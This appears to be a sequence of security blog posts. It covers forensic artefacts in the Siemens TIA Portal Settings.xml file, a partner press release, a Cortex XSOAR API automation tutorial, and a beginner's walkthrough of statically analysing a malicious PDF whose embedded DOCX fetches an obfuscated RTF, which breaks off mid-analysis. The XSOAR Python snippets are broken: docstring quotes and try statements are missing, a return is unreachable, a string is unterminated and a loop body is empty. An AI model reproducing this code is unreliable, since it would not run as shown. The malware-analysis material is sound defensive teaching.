
The file can be investigated with a text editor of your choice as it has a plain XML structure. Many nodes contain readable strings, although there are some exceptions that contain encoded binary data.  

A few nodes are of specific interest:

  • “LastOpenedProject”
  • “LRUProjectStorageLocation”
  • “LRUProjectArchiveStorageLocation”
  • “LastProjects”
  • “ConnectionServices”
  • “LoadServices”

We will look at each of these nodes, what information they contain and how they behaved in our testing. As the file is present for a specific user, everything in it is related to that specific user account. So if we state that some information represents the last opened project, it is meant for the specific user the Settings.xml file belongs to and not globally for the entire system.


Figure 1: Settings.xml LastOpenedProject node

This node is located under the SettingNode named “General” and contains one child node. As you can see from the screenshot above, this child node is a full path to an “.ap15_1” file. As the name already implies, this is the last project opened with the TIA Portal.  In this example the project root folder is “testproject_09”, the storage location of the project is located at “C:\Users\nviso\Documents\Automation\” and the file used to open the project “testproject_09.ap15_1”.


Last opened project

  • If the TIA Portal is opened and closed without opening a project, the child note will be empty. This also represents exactly what happened: no project was opened.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal. Removing a project from this list is a native build in function of the TIA Portal.
Figure 2: TIA Portal dialog to open and remove recently used projects


Figure 3: Settings.xml LRUProjectStorageLocation node

This node is located under the SettingNode named “General”, as a neighbour of the “LastOpenenProject” node we discussed earlier. It also contains only one child node representing the path to the location where the most recently opened project is located. More precisely to the location of the root folder of the project.


Path to folder containing the most recently opened project

  • The value of the child node is not affected if the TIA Portal is opened & closed without opening any project.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal.


Figure 4: Settings.xml LRUProjectArchiveStorageLocation node

This node is located under the SettingNode named “General”, as a neighbour of the “LastOpenenProject” node we discussed earlier. If a project file is opened in the TIA Portal and the archive function is used (Main menu bar: Project -> Archive…) the full path to the folder specified in the “Target path” field is written to this value.

Figure 5: TIA Portal Archive Project Dialog

Full path to the most recent folder specified to archive a project.

  • The value is overwritten if a different location is chosen while archiving a project.
  • Unless the archive function is used, the node is not present in the “Settings.xml” file.


Figure 6: Settings.xml LastProjects node

The “LastProjects” node is a child node of the SettingsNode named “ProjectSettings”. The “ProjectSettings” node is located at the same level as the “General” node discussed earlier. As shown in the excerpt above, the node contains a list of full path entries for “.apXX” files. This list shows the opened projects represented in chronological order, with the most recent project on top.


Chronological orders list of opened projects

  • The content of this node is not affected when the TIA Portal is opened and closed without opening a project.
  • If a project is removed from the list of recently used projects, the corresponding “String” node containing the full path to the project is removed from the list. The chronological order will still be intact afterwards.
  • Entries in this list are unique. If a project already present in the list is opened again, the entry will be moved to the top position.
  • In our testing we have seen 10+ child nodes for opened projects. We did not test for a maximum value of projects that are tracked in the “LastProjects” node.
  • If a new project is created and saved in the TIA Portal, it will show up in this list, but not show up in the Jump List. (We covered this in part 1 of the series)


Figure 7: Settings.xml ConnectionService node (parts have been remove for readability)

The “ConnectionService” node is a neighbour of the “ProjectSettings” and the “General” node. It contains child nodes named after the full path of projects. These child nodes can contain the creation date and time of the project in UTC, stored in a child node called “CreationTime”. Further they can contain a child node called “ControllerConfiguration” which might have several child nodes for configured PLCs. Theses PLC nodes (“{1052700-1391}” in the example above) shows information how to communicate with the PLC, in the node named “OamAddress”. As demonstrated in the screenshot the “OamAddress” node can give us information like the IP-Address and subnet-mask used to reach the PLC.


List of projects that were worked on within the TIA Portal. Under certain circumstances creation time of the project in UTC and connection information for configured PLCs is shown.

  • The content of this node and its child’s is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its child’s is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A “SettingNode” entry for a specific project is not added directly after an empty project is created, neither is it added when an empty project is re-open again.
  • A “SettingNode” including the project creation timestamp in UTC is created when you start to configure the project, for example by adding a PLC to it.
  • The creation timestamp is taken from within the project, so if a project file is copied to a different host and opened there, the creation date and time of the original project is listed.
  • The “SettingNode” for a specific project is extended with a “SettingNode” named “ControllerConfiguration” if communication with a configured PLC has been performed, in example using the “go online” function or downloading logic to the PLC.
  • If multiple PLCs are configured, the “ControllerConfiguration” node contains multiple child nodes representing the configuration for each of the PLCs.
  • Our testing has shown that the child nodes containing the information per PLC are not randomly named. If the same PLC is used in multiple projects, the node will get the same name. Applying this to our example above means, that if the PLC is added to three different projects, you will find a SettingNode named “{1052700-1391}” in all three “ControllerConfiguration” sections. Of cause only if the conditions to write a “ControllerConfiguration” are met.
  • If a PLC is removed from a project, the corresponding child node under “ControllerConfiguration” is not removed.


Figure 8: Settings.xml LoadServices node

The “LoadService” node is a neighbour of the “ProjectSettings” and the “General” node. It contains child nodes named after the full path of projects. As shown above, the child nodes given an ID as name, like we already saw within the “ConnectionServices” section.


List of projects that were worked on within the TIA Portal.

  • The content of this node and its child’s is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its child’s is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A project will only show up under “LoadServices” if a PLC is added to the project and configuration is done to communicate with the PLC, like setting an IP-Address to its interface.
  • According to our testing, the child nodes of a project node under “LoadServices” are not randomly named and behave the same way as mentioned in the “ConnectionServices” section. The screenshot above shows the same PLC added to two different projects. The name does not match with the named assigned for a PLC in the “ConnectionServices” node section.
  • If a PLC is removed from a project, the corresponding child node under “LoadService” is not removed.
  • If a complete project, with PLCs configured is copied to a different location on the same machine, opened and an interaction to the PLC is initiated with the “go online” function, no additional entry in the “LoadService” section for the copied project is created. If the IP-Address configuration for the PLC is changed in the project, an entry will be created though.  At the moment it is unclear why this happens. A theory could be that the configuration of the IP-Address creates the entry and the first interaction with the PLC just updates the entry if it exists. If it does not find a matching entry nothing is done.


Manually searching in .xml files and highlighting the important notes is a cumbersome process. In order to provide some help for extracting the interesting parts of a “Settings.xml” file I took the liberty and created a small python tool. You can download the tool from my GitHub repository.

By invoking it with the command below, the discussed nodes are extracted:

python3 ./ -f PATH_TO_SETTINGS.XML

Figure 9: Sample output of

At the end of this second blog post some general notes on the “Settings.xml” file. This file belongs to the user, no additional privileges would be needed to change or delete the file. If you delete the file and start the TIA Portal, it will automatically create a fresh “Settings.xml” file. So it seems pretty easy to manipulate or clean this file. Still the user (or the adversary) first needs to be aware that this file exists and which information it stores! The file is written as part of the tasks performed when the TIA Portal is closed normally. If the TIA portal crashes, or the process get killed by other means, the file will not be updated.

Conclusion & Outlook

In this second part we have shown that the “Settings.xml” does store valuable information and should be considered when analysing machines running the TIA portal. Further we have introduced a free tool to extract this data and as a small bonus a KAPE target to collect the “Settings.xml” file.

In the third part of this series of blog posts, we will have a look at what data we can extract from projects created with the TIA Portal.

About the Author

Olaf Schwarz is a Senior Incident Response Consultant at NVISO. You can find Olaf on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all out future research and publications.

NVISO achieves Palo Alto Networks Cortex eXtended Managed Detection and Response (XMDR) Specialization

31 March 2022 at 08:00

Brussels, March, 23, 2022 Managed Security Services provider NVISO, today announced it has become a Palo Alto Networks Cortex® XMDR Specialization partner. NVISO joins a select group of channel partners who have earned this distinction through operational capabilities and fulfillment of business requirements and completion of technical, sales enablement and specialization examinations. The Cortex XMDR Specialization will enable NVISO to combine the power of best-in-class Cortex XDR™ detection and response solution with their managed services offerings — helping customers worldwide streamline security operations center (SOC) operations and quickly mitigate cyberthreats. 

 “We are excited to partner with Palo Alto Networks to provide our customers with next-generation security technology for our services,” said Carola Wondrak, Business Development Lead at NVISO. Erik Van Buggenhout, Partner at NVISO emphasizes this further: “NVISO’s priority has always been delivering world-class cyber security services to our clients that are not bound to particular technology products or vendors. This being said, we consider Palo Alto Cortex a best-in-class, leading, platform which we rely on at the core of our managed services. We are thus very excited to be recognized as an XMDR Specialization partner.”

“Organizations need effective detection and response across the network, endpoint, and cloud but managing today’s threats effectively is a massive undertaking,” said Karl Soderlund, senior vice president, Worldwide Channel Sales at Palo Alto Networks. “NVISO’s commitment to attain the Cortex XMDR Specialization will give their managed security services customers peace of mind that the services they are choosing will mitigate security gaps and relieve the day-to-day burden of security operations for customers with 24/7 coverage.”

NVISO has a successful history with Palo Alto Networks, specifically focusing on Cortex solutions.  Through everything NVISO does, automation plays a crucial role. As an XSOAR MSSP partner of Palo Alto Networks, NVISO builds on Cortex XSOAR for its own internal efficiency through automation and orchestration, yet also provides automation services to its customers as an MSSP. NVISO has flexible deployments models whereby it can provide either dedicated, co-managed (shared responsibility between NVISO and the end customer) or fully outsourced XSOAR deployment models.

To achieve Specialization status, Palo Alto Networks partner organizations must have Cortex XDR-certified SOC analysts/threat hunters on staff and available 24/7. Partners seeking this XMDR Specialization distinction must also complete both technical and sales enablement and specialization examinations. Cortex XMDR Specialization partners combine experienced analysts, mature operational processes and proven customer support with Palo Alto Networks market-leading security products, enabling them to provide customers comprehensive visibility, detection and response across network, endpoint and cloud assets, combined with best-in-class threat prevention and in-depth security expertise.

To learn more about NVISOs Managed Services, visit: Managed Detect & Respond | NVISO

NVISO is a European cyber security firm specialized in IT security consultancy and managed security services. Looking to further expand its footprint throughout Europe, NVISO currently has as offices in Brussels, Frankfurt and Munich, with new office openings planned later this year.

NVISO’s expert workforce consists of over 160 cyber security professionals, spread over Belgium, Germany, France, Austria and Greece. With world-class expertise as a key differentiator, our experts have obtained most of the well-known certifications in the industry, author and teach SANS courses and regularly present their expertise at conferences.


Media Contact:

Carola Wondrak


[email protected]

Cortex XSOAR Tips & Tricks – Using The API In Automations

By: wstinkens
1 April 2022 at 08:00


When developing automations in Cortex XSOAR, you can use the Script Helper in the built-in Cortex XSOAR IDE to view all the scripts and commands available for automating tasks. When there is no script or command available for the specific task you want to automate, you can use the Cortex XSOAR API to automate most tasks available in the web interface.

In this blogpost we will show you how to discover the API endpoints in Cortex XSOAR for specific tasks and which options are available to use them in your own custom automations. As an example we will automate replacing evidences in the incident evidence board.

To enable you to use the Cortex XSOAR API in your own automations, we have created a nitro_execute_http_request function which is available on the NVISO GitHub:

Cortex XSOAR API Endpoints

Before you can use the Cortex XSOAR API in your automation, you will need to know which API endpoints are available. The Cortex XSOAR API documentation can be found in Settings > Integrations > API Keys:

Here you can see the following links:

  • View Cortex XSOAR API: Open the API documentation on the XSOAR server
  • Download Cortex XSOAR API Guide: Download a PDF with the API documentation
  • Download REST swagger file: Download a JSON file which can be imported into a Swagger editor

You can use these links to view all the documented API Endpoints for Cortex XSOAR with the path, parameters and responses including example request body’s and responses. Importing the Swagger JSON file into a Swagger Editor or Postman will allow you to interact with the API for testing without writing a single line of code.

Using The API In Automations

Once you have determined the Cortex XSOAR API endpoint to use, you have 2 options available for use in an automation.

The first option is by using the internalHttpRequest method of the demisto class. This will allow you to do an internal HTTP request on the Cortex XSOAR server. It is the faster of the 2 options but there is a permissions limitation when using this in playbooks. The request runs with the permissions of the executing user, when a command is being executed manually (such as via the War Room or when browsing a widget). When run via a playbook, it will run with a read-only user with limited permissions isolated to the current incident only.

The second option for using the API in automations is the Demisto REST API integration. This integration is part of the Demisto REST API content pack available in the Cortex XSOAR Marketplace.

After installing the content pack, you will need to create an API key in Settings > Integrations > API Keys:

Click on Get Your Key, give it a name and click Generate key:

Copy your key and store it in a secure location:

If you have a multi-tenant environment, you will need to synchronize this key to the different accounts.

Next you will need to configure the Demisto REST API integration:

Click Add instance and copy the API key and click Test to verify that the integration is working correctly:

You will now be able to use the following commands in your automations:

  • demisto-api-delete: send HTTP DELETE request
  • demisto-api-download: Download files from XSOAR server
  • demisto-api-get: send HTTP GET requests
  • demisto-api-multipart: Send HTTP Multipart request to upload files to XSOAR server
  • demisto-api-post: send HTTP POST request
  • demisto-api-put: send HTTP PUT request
  • demisto-delete-incidents: Delete XSOAR incidents

To do HTTP requests when only read permissions are required, you should use the internalHTTPRequest method of the demisto class because it does not require an additional integration and has better performance. From the Demisto REST API integration, you will mostly be using the demisto-api-post command for doing HTTP Post requests in your automations when write permissions are required.


Similar to the demisto.executeCommand method, the demisto.internalHttpRequest does not throw an error when the request fails. Therefore, we have created a nitro_execute_http_request wrapper function to add error handling which you can use in your own custom automations.

import json

def nitro_execute_http_request(method: str, uri: str, body: dict = None) -> dict:
    Send internal http requests to XSOAR server
    :type method: ``str``
    :param method: HTTP Method (GET / POST / PUT / DELETE)
    :type uri: ``str``
    :param uri: Request URI
    :type body: ``dict``
    :param body: Body of request
    :return: dict of response body
    :rtype: ``dict``

    response = demisto.internalHttpRequest(method, uri, body)
    response_body = json.loads(response.get('body'))

    if response.get('statusCode') != 200:
        raise Exception(f"Func: nitro_execute_http_request; {response.get('status')}: {response_body.get('detail')}; "
                        f"error: {response_body.get('error')}")
        return response_body

When you use this function to call demisto.internalHttpRequest, it will return an error when the HTTP request fails:

    uri = "/evidence/search"
    method = "POST"
    body = {"incidentID": '9999999'}

    return_results(nitro_execute_http_request(method=method, uri=uri, body=body))
except Exception as ex:
    return_error(f'Failed to execute nitro_execute_http_request. Error: {str(ex)}')

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_http_request in all your custom automations.

Incident Evidences Example

To provide you an example of how to use the API in an automation, we will show how to replace evidences in the incident Evidence Board in Cortex XSOAR. We will build on the example of the previous post in this series where we add evidences based on the tags of an entry in the war room:

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

If you search the script helper in the built-in IDE, you will see that there is already an AddEvidence automation:

When using this command in a playbook to add evidences to the incident Evidence Board, you will get duplicates when the playbooks is run multiple times. This could lead to confusing for the SOC analyst and should be avoided. A replace argument is not available in the AddEvidence command but we can implement this using the Cortex XSOAR API.

To implement the replace functionality, we will first need to search for an entry in the incident Evidence Board with the same description, delete it and then add it again. There are no built-in automations available that support this but it is supported by the Cortex XSOAR API.

If we search the API documentation, we can see the following API Endpoints:

  • /evidence/search
  • /evidence/delete

To search for evidences with the same description, we have created a function:

def nitro_get_incident_evidences(incident_id: str, query: str = None) -> list:
    Get list of incident evidences
    :type incident_id: ``str``
    :param incident_id: XSOAR incident id
    :type query: ``str``
    :param query: query for evidences
    :return: list of evidences
    :rtype: ``list``

    uri = "/evidence/search"
    body = {"incidentID": incident_id}
    if query:
        body.update({"filter": {"query": query}})

    results = nitro_execute_http_request(method='POST', uri=uri, body=body)

    return results.get('evidences', [])

This function uses the wrapper function of the faster internalHTTPRequest method in the demisto class because it does not require write permissions.

To delete the evidences we have created a second function which uses the demisto-api-post command because write permissions are required:

def nitro_delete_incident_evidence(evidence_id: str):
    Delete incident evidence
    :type evidence_id: ``str``
    :param evidence_id: XSOAR evidence id

    uri = '/evidence/delete'
    body = {'evidenceID': evidence_id}

    nitro_execute_command(command='demisto-api-post', args={"uri": uri, "body": body})

We use the nitro_execute_command function we discussed in a previous post in this series to add error handling.

We use these 2 functions to first search for evidences with the same description, delete them and add the tagged war room entries as evidence in the incident Evidence Board again.

description = 'Example Evidence'
incident_id = demisto.incident().get('id)

query = f"description:\"{description}\""
evidences = nitro_get_incident_evidences(incident_id=incident_id, query=query)

for evidence in evidences:

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': description })


About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

Wouter via his LinkedIn page.

Want to learn more about SOAR? Sign- up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.

Analyzing a “multilayer” Maldoc: A Beginner’s Guide

6 April 2022 at 08:21

In this blog post, we will not only analyze an interesting malicious document, but we will also demonstrate the steps required to get you up and running with the necessary analysis tools. There is also a howto video for this blog post.

I was asked to help with the analysis of a PDF document containing a DOCX file.

The PDF is REMMITANCE INVOICE.pdf, and can be found on VirusTotal, MalwareBazaar and Malshare (you don’t need a subscription to download from MalwareBazaar or Malshare, so everybody that wants to, can follow along).

The sample is interesting for analysis, because it involves 3 different types of malicious documents.
And this blog post will also be different from other maldoc analysis blog posts we have written, because we show how to do the analysis on a machine with a pristine OS and without any preinstalled analysis tools.

To follow along, you just need to be familiar with operating systems and their command-line interface.
We start with a Ubuntu LTS 20.0 virtual machine (make sure that it is up-to-date by issuing the “sudo apt update” and “sudo apt upgrade” commands). We create a folder for the analysis: /home/testuser1/Malware (we usually create a folder per sample, with the current date in the filename, like this: 20220324_twitter_pdf). testuser1 is the account we use, you will have another account name.

Inside that folder, we copy the malicious sample. To clearly mark the sample as (potentially) malicious, we give it the extension .vir. This also prevents accidental launching/execution of the sample. If you want to know more about handling malware samples, take a look at this SANS ISC diary entry.

Figure 1: The analysis machine with the PDF sample

The original name of the PDF document is REMMITANCE INVOICE.pdf, and we renamed it to REMMITANCE INVOICE.pdf.vir.
To conduct the analysis, we need tools that I develop and maintain. These are free, open-source tools, designed for static analysis of malware. Most of them are written in Python (a free, open-source programming language).
These tools can be found here and on GitHub.

PDF Analysis

To analyze a malicious PDF document like this one, we are not opening the PDF document with a PDF reader like Adobe Reader. In stead, we are using dedicated tools to dissect the document and find malicious code. This is known as static analysis.
Opening the malicious PDF document with a reader, and observing its behavior, is known as dynamic analysis.

Both are popular analysis techniques, and they are often combined. In this blog post, we are performing static analysis.

To install the tools from GitHub on our machine, we issue the following “git clone” command:

Figure 2: The “git clone” command fails to execute

As can be seen, this command fails, because on our pristine machine, git is not yet installed. Ubuntu is helpful and suggest the command to execute to install git:

sudo apt install git

Figure 3: Installing git
Figure 4: Installing git

When the DidierStevensSuite repository has been cloned, we will find a folder DidierStevensSuite in our working folder:

Figure 5: Folder DidierStevensSuite is the result of the clone command

With this repository of tools, we have different maldoc analysis tools at our disposal. Like PDF analysis tools. and are two PDF analysis tools found in Didier Stevens’ Suite. pdfid is a simple triage tool, that looks for known keywords inside the PDF file, that are regularly associated with malicious activity. is able to parse a PDF file and identify basic building blocks of the PDF language, like objects.

To run on our Ubuntu machine, we can start the Python interpreter (python3), and give it the program as first parameter, followed by options and parameters specific for pdfid. The first parameter we provide for pdfid, is the name of the PDF document to analyze. Like this:

Figure 6: pdfid’s analysis report

In the report provided as output by pdfid, we see a bunch of keywords (first column) and a counter (second column). This counter simply indicates the frequency of the keyword: how many times does it appear in the analyzed PDF document?

As you can see, many counters are zero: keywords with zero counter do not appear in the analyzed PDF document. To make the report shorter, we can use option -n. This option excludes zero counters (n = no zeroes) from the report, like this:

Figure 7: pdfid’s condensed analysis report

The keywords that interest us the most, are the ones after the /Page keyword.
Keyword /EmbeddedFile means that the PDF contains an embedded file. This feature can be used for benign and malicious purposes. So we need to look into it.
Keyword /OpenAction means that the PDF reader should do something automatically, when the document is opened. Like launching a script.
Keyword /ObjStm means that there are stream objects inside the PDF document. Stream objects are special objects, that contain other objects. These contained objects are compressed. pdfid is in nature a simple tool, that is not able to recognize and handle compressed data. This has to be done with Whenever you see stream objects in pdfid’s report (e.g., /ObjStm with counter greater than zero), you have to realize that pdfid is unable to give you a complete report, and that you need to use pdf-parser to get the full picture. This is what we do with the following command:

Figure 8: pdf-parser’s statistical report

Option -a is used to have produce a report of all the different elements found inside the PDf document, together with keywords like produces.
Option -O is used to instruct pdf-parser to decompress stream objects (/ObjStm) and include the contained objects into the statistical report. If this option is omitted, then pdf-parser’s report will be similar to pdfid’s report. To know more about this subject, we recommend this blog post.

In this report, we see again keywords like /EmbeddedFile. 1 is the counter (e.g., there is one embedded file) and 28 is the index of the PDF object for this embedded file.
New keywords that did appear, are /JS and /JavaScript. They indicate the presence of scripts (code) in the PDF document. The objects that represent these scripts, are found (compressed) inside the stream objects (/ObjStm). That is why they did not appear in pdfid’s report, and why they do in pdf-parser’s report (when option -O is used).
JavaScript inside a PDF document is restricted in its interactions with the operating system resources: it can not access the file system, the registry, … .
Nevertheless, the included JavaScript can be malicious code (a legitimate reason for the inclusion of JavaScript in a PDF document, is input validation for PDF forms).
But we will first take a look at the embedded file. We to this by searching for the /EmbeddedFile keyword, like this:

Figure 9: Searching for embedded files

Notice that the search option -s is not case sensitive, and that you do not need to include the leading slash (/).
pdf-parser found one object that represents an embedded file: the object with index 28.
Notice the keywords /Filter /Flatedecode: this means that the embedded file is not included into the PDF document as-is, but that it has been “filtered” first (e.g., transformed). /FlateDecode indicates which transformation was applied: “deflation”, e.g., zlib compression.
To obtain the embedded file in its original form, we need to decompress the contained data (stream), by applying the necessary filters. This is done with option -f:

Figure 10: Decompressing the embedded file

The long string of data (it looks random) produced by pdf-parser when option -f is used, is the decompressed stream data in Python’s byte string representation. Notice that this data starts with PK: this is a strong indication that the embedded file is a ZIP container.
We will now use option -d to dump (write) the contained file to disk. Since it is (potentially) malicious, we use again extension .vir.

Figure 11: Extracting the embedded file to disk

File embedded.vir is the embedded file.

Office document analysis

Since I was told that the embedded file is an Office document, we use a tool I developed for Office documents:
But if you would not know what type the embedded file is, you would first want to determine this. We will actually have to do that later, with a downloaded file.

Now we run on the embedded file we extracted: embedded.vir

Figure 12: No ole file was found

The output of oledump here is a warning: no ole file was found.
A bit of background can help understand what is happening here. Microsoft Office document files come in 2 major formats: ole files and OOXML files.
Ole files (official name: Compound File Binary Format) are the “old” file format: the binary format that was default until Office 2007 was released. Documents using this internal format have extensions like .doc, .xls, .ppt, …
OOXML files (Office Open XML) are the “new” file format. It’s the default since Office 2007. Its internal format is a ZIP container containing mostly XML files. Other contained file types that can appear are pictures (.png, .jpeg, …) and ole (for VBA macros for example). OOXML files have extensions like .docx, .xlsx, .docm, .xlsm, …
OOXML is based on another format: OPC. is a tool to analyze ole files. Most malicious Office documents nowadays use VBA macros. VBA macros are always stored inside ole files, even with the “new” format OOXML. OOXML documents that contain macros (like .docm), have one ole file inside the ZIP container (often named vbaProject.bin) that contains the actual VBA macros.
Now, let’s get back to the analysis of our embedded file: oledump tells us that it found no ole file inside the ZIP container (OPC).
This tells us 1) that the file is a ZIP container, and more precisely, an OPC file (thus most likely an OOXML file) and 2) that it does not contain VBA macros.
If the Office document contains no VBA macros, we need to look at the files that are present inside the ZIP container. This can be done with a dedicated tool for the analysis of ZIP files:
We just need to pass the embedded file as parameter to zipdump, like this:

Figure 13: Looking inside the ZIP container

Every line of output produced by zipdump, represents a contained file.
The presence of folder “word” tells us that this is a Word file, thus extension .docx (because it does not contain VBA macros).
When an OOXML file is created/modified with Microsoft Office, the timestamp of the contained files will always be 1980-01-01.
In the result we see here, there are many files that have a different timestamp: this tells us, that this .docx file has been altered with a ZIP tool (like WinZip, 7zip, …) after it was saved with Office.
This is often an indicator of malicious intend.
If we are presented with an Office document that has been altered, it is recommended to take a look at the contained files that were most recently changed, as this is likely the file that has been tampered for malicious purposed.
In our extracted sample, that contained file is the file with timestamp 2022-03-23 (that’s just a day ago, time of writing): file document.xml.rels.
We can use to take a closer look at this file. We do not need to type its full name to select it, we can just use its index: 14 (this index is produced by zipdump, it is not metadata).
Using option -s, we can select a particular file for analysis, and with option -a, we can produce a hexadecimal/ascii dump of the file content. We start with this type of dump, so that we can first inspect the data and assure us that the file is indeed XML (it should be pure XML, but since it has been altered, we must be careful).

Figure 14: Hexadecimal/ascii dump of file document.xml.rels

This does indeed look like XML: thus we can use option -d to dump the file to the console (stdout):

Figure 15: Using option -d to dump the file content

There are many URLs in this output, and XML is readable to us humans, so we can search for suspicious URLs. But since this is XML without any newlines, it’s not easy to read. We might easily miss one URL.
Therefor, we will use a tool to help us extract the URLs: is a tool that uses regular expressions to search through text files. And it comes with a small embedded library of regular expressions, for URLs, email addresses, …
If we want to use the embedded regular expression for URLs, we use option -n url.
Like this:

Figure 16: Extracting URLs

Notice that we use option -u to produce a list of unique URLs (remove duplicates from the output) and that we are piping 2 commands together. The output of command zipdump is provided as input to command re-search by using a pipe (|).
Many tools in Didier Stevens’ Suite accept input from stdin and produce output to stdout: this allows them to be piped together.
Most URLs in the output of re-search have as FQDN: these are normal URLs, to be expected in OOXML files. To help filtering out URLs that are expected to be found in OOXML files, re-search has an option to filter out these URLs. This is option -F with value officeurls.

Figure 17: Filtered URLs

One URL remains: this is suspicious, and we should try to download the file for that URL.

Before we do that, we want to introduce another tool that can be helpful with the analysis of XML files: xmldump parses XML files with Python’s built-in XML parser, and can represent the parsed output in different formats. One format is “pretty printing”: this makes the XML file more readable, by adding newlines and indentations. Pretty printing is achieved by passing parameter pretty to tool, like this:

Figure 18: Pretty print of file document.xml.rels

Notice that the <Relationship> element with the suspicious URL, is the only one with attribute TargetMode=”External”.
This is an indication that this is an external template, that is loaded from the suspicious URL when the Office document is opened.
It is therefore important to retrieve this file.

Downloading a malicious file

We will download the file with curl. Curl is a very flexible tool to perform all kinds of web requests.
By default, curl is not installed in Ubuntu:

Figure 19: Curl is missing

But it can of course be installed:

Figure 20: Installing curl

And then we can use it to try to download the template. Often, we do not want to download that file using an IP address that can be linked to us or our organisation. We often use the Tor network to hide behind. We use option -x to direct curl to use a proxy, namely the Tor service running on our machine. And then we like to use option -D to save the headers to disk, and option -o to save the downloaded file to disk with a name of our choosing and extension .vir.
Notice that we also number the header and download files, as we know from experience, that often several attempts will be necessary to download the file, and that we want to keep the data of all attempts.

Figure 21: Downloading with curl over Tor fails

This fails: the connection is refused. That’s because port 9050 is not open: the Tor service is not installed. We need to install it first:

Figure 22: Installing Tor

Next, we try again to download over Tor:

Figure 23: The download still fails

The download still fails, but with another error. The CONNECT keyword tells us that curl is trying to use an HTTP proxy, and Tor uses a SOCKS5 proxy. I used the wrong option: in stead of option -x, I should be using option –socks5 (-x is for HTTP proxies).

Figure 24: The download seems to succeed

But taking a closer look at the downloaded file, we see that it is empty:

Figure 25: The downloaded file is empty, and the headers indicate status 301

The content of the headers file indicates status 301: the file was permanently moved.
Curl will not automatically follow redirections. This has to be enabled with option -L, let’s try again:

Figure 26: Using option -L

And now we have indeed downloaded a file:

Figure 27: Download result

Notice that we are using index 2 for the downloaded files, as to not overwrite the first downloaded files.
Downloading over Tor will not always work: some servers will refuse to serve the file to Tor clients.
And downloading with Curl can also fail, because of the User Agent String. The User Agent String is a header that Curl includes whenever it performs a request: this header indicates that the request was done by curl. Some servers are configured to only serve files to clients with the “proper” User Agent String, like the ones used by Office or common web browsers.
If you suspect that this is the case, you can use option -A to provide an appropriate User Agent String.

As the downloaded file is a template, we expect it is an Office document, and we use to analyze it:

Figure 28: Analyzing the downloaded file with oledump fails

But this fails. Oledump does not recognize the file type: the file is not an ole file or an OOXML file.
We can use Linux command file to try to identify the file type based on its content:

Fgiure 29: Command file tells us this is pure text

If we are to believe this output, the file is a pure text file.
Let’s do a hexadecimal/ascii dump with command xxd. Since this will produce many pages of output, we pipe the output to the head command, to limit the output to the first 10 lines:

Figure 30: Hexadecimal/ascii dump of the downloaded file

RTF document analysis

The file starts with {\rt : this is a deliberately malformed RTF file. Richt Text Format is a file format for Word documents, that is pure text. The format does not support VBA macros. Most of the time, malicious RTF files perform malicious actions through exploits.
Proper RTF files should start with {\rtf1. The fact that this file starts with {\rt. is a clear indication that the file has been tampered with (or generated with a maldoc generator): Word will not produce files like this. However, Word’s RTF parser is forgiving enough to accept files like this.

Didier Stevens’ Suite contains a tool to analyze RTF files:
By default, running on an RTF file produces a lot of output:

Figure 31: Parsing the RTF file

The most important fact we know from this output, is that this is indeed an RTF file, since rtfdmp was able to parse it.
As RTF files often contain exploits, they often use embedded objects. Filtering rtfdump’s output for embedded objects can be done with option -O:

Figure 32: There are no embedded objects

No embedded objects were found. Then we need to look at the hexadecimal data: since RTF is a text format, binary data is encoded with hexadecimal digits. Looking back at figure 30, we see that the second entry (number 2) contains 8349 hexadecimal digits (h=8349). That’s the first entry we will inspect further.
Notice that 8349 is an uneven number, and that encoding a single byte requires 2 hexadecimal digits. This is an indication that the RTF file is obfuscated, to thwart analysis.
Using option -s, we can select entry 2:

Figure 33: Selecting the second entry

If you are familiar with the internals of RTF files, you would notice that the long, uninterrupted sequences of curly braces are suspicious: it’s another sign of obfuscation.
Let’s try to decode the hexadecimal data inside entry 2, by using option -H

Figure 34: Hexadecimal decoding

After some randomly looking bytes and a series of NULL bytes, we see a lot of FF bytes. This is typical of ole files. Ole files start with a specific set of bytes, known as a magic header: D0 CF 11 E0 A1 B1 1A E1.
We can not find this sequence in the data, however we find a sequence that looks similar: 0D 0C F1 1E 0A 1B 11 AE 10 (starting at position 0x46)
This is almost the same as the magic header, but shifted by one hexadecimal digit. This means that the RTF file is obfuscated with a method that has not been foreseen in the deobfuscation routines of rtfdump. Remember that the number of hexadecimal digits is uneven: this is the result. Should rtfdump be able to properly deobfuscate this RTF file, then the number would be even.
But that is not a problem: I’ve foreseen this, and there is an option in rtfdump to shift all hexadecimal strings with one digit. This is option -S:

Figure 35: Using option -S to manually deobfuscate the file

We have different output now. Starting at position 0x47, we now see the correct magic header: D0 CF 11 E0 A1 B1 1A E1
And scrolling down, we see the following:

Figure 36: ole file directory entries (UNICODE)

We see UNICODE strings RootEntry and ole10nAtiVE.
Every ole file contains a RootEntry.
And ole10native is an entry for embedded data. It should all be lower case: the mixing of uppercase and lowercase is another indicator for malicious intend.

As we have now managed to direct rtfdump to properly decode this embedded olefile, we can use option -i to help with the extraction:

Figure 37: Extraction of the olefile fails

Unfortunately, this fails: there is still some unresolved obfuscation. But that is not a problem, we can perform the extraction manually. For that, we locate the start of the ole file (position 0x47) and use option -c to “cut” it out of the decoded data, like this:

Figure 38: Hexadecimal/ascii dump of the embedded ole file

With option -d, we can perform a dump (binary data) of the ole file and write it to disk:

Figure 39: Writing the embedded ole file to disk

We use oledump to analyze the extracted ole file (ole.vir):

